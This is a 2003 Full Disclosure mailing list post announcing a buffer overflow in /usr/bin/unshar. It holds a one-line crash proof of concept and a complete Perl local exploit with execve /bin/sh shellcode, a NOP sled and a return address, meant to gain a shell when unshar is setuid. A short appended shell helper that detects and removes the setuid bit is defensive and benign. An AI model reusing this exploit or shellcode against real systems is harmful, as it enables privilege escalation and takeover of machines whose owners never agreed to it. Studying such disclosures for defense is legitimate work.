Full Disclosure mailing list archives
flames security group start to play , yet another vuln found (rustymemory and welshboi)
From: rustymemory <rustymemory () cisco-ninjas com>
Date: Wed, 3 Dec 2003 17:36:30 +0000
By: flames.bluefox.net.nz

if unshar suid; then you w00t

proof of concept?

rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'`
............................AAAAAAAAAAAAAASegmentation fault

welshboi@flames:~$ more unshar.pl
#!/usr/bin/perl
#/usr/bin/unshar local sploit.
#coded by welshboi (deadbeat)
#found by rustymemory
#
#FLAMES SECURITY GROUP
#Private, please dont distribute
#affects all linux distributions , tested on slackware 9.1 and MDK
###############################################
#[deadbeat@pikachu sploits]$ perl unshar.pl
#
#
#[] /usr/bin/unshar exploit
#[] coded by: deadbeat []
#[] found by: rustymemory []
#_f1GWugHu[SPZ
#
#
#sh-2.05b$
###############################################

# 47byte shellcode (exec /bin/sh)
$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
        "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";

$egg = 2000;
$buf = 1128;
$nop = "\x90";
$offset = 0;
$ret = 0x40055bdc;

if(@ARGV == 1) {$offset = $ARGV[0];}
$addr = pack('l', ($ret + $offset));

for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
$evil .= $hell;

print "\n[] /usr/bin/unshar exploit []\n";
print "[] coded by: deadbeat, uk2sec []\n";
print "[] found by: rustymemory []\n\n";
print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
system("/usr/bin/unshar -f $evil");

---------------------------------------------------------
shouts to ? calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest of flames security group. and rusty's fiancee

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
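The post's precondition is "if unshar suid": the overflow only becomes a privilege escalation when the binary carries the setuid bit. The following audit helper is an added example, not part of the post; it checks a path for the setuid bit, drops it as the remediation, and demonstrates on a constructed temporary file rather than on /usr/bin/unshar (assumed path from the post).

```shell
# Report whether a binary carries the setuid bit. Prints a status line;
# returns 0 when setuid is set, 1 otherwise.
setuid_status() {
    p="$1"
    if [ -u "$p" ]; then
        # stat -c is GNU-specific; fall back to '?' where it is unavailable.
        printf '%s: setuid (owner %s)\n' "$p" "$(stat -c %U "$p" 2>/dev/null || echo '?')"
        return 0
    fi
    printf '%s: not setuid\n' "$p"
    return 1
}

# Remediation for a setuid binary with a local overflow: clear the bit so a
# crash in argument handling no longer runs as the file owner. Returns 0 on success.
drop_setuid() {
    chmod u-s "$1" && ! [ -u "$1" ]
}

# Demonstration on a constructed temp file (the real target in the post is
# /usr/bin/unshar); the setuid bit is set on a file we own, then removed.
demo() {
    t=$(mktemp) || return 1
    chmod 0755 "$t"
    chmod u+s "$t"
    setuid_status "$t"
    drop_setuid "$t"
    setuid_status "$t"
    rm -f "$t"
}
demo
```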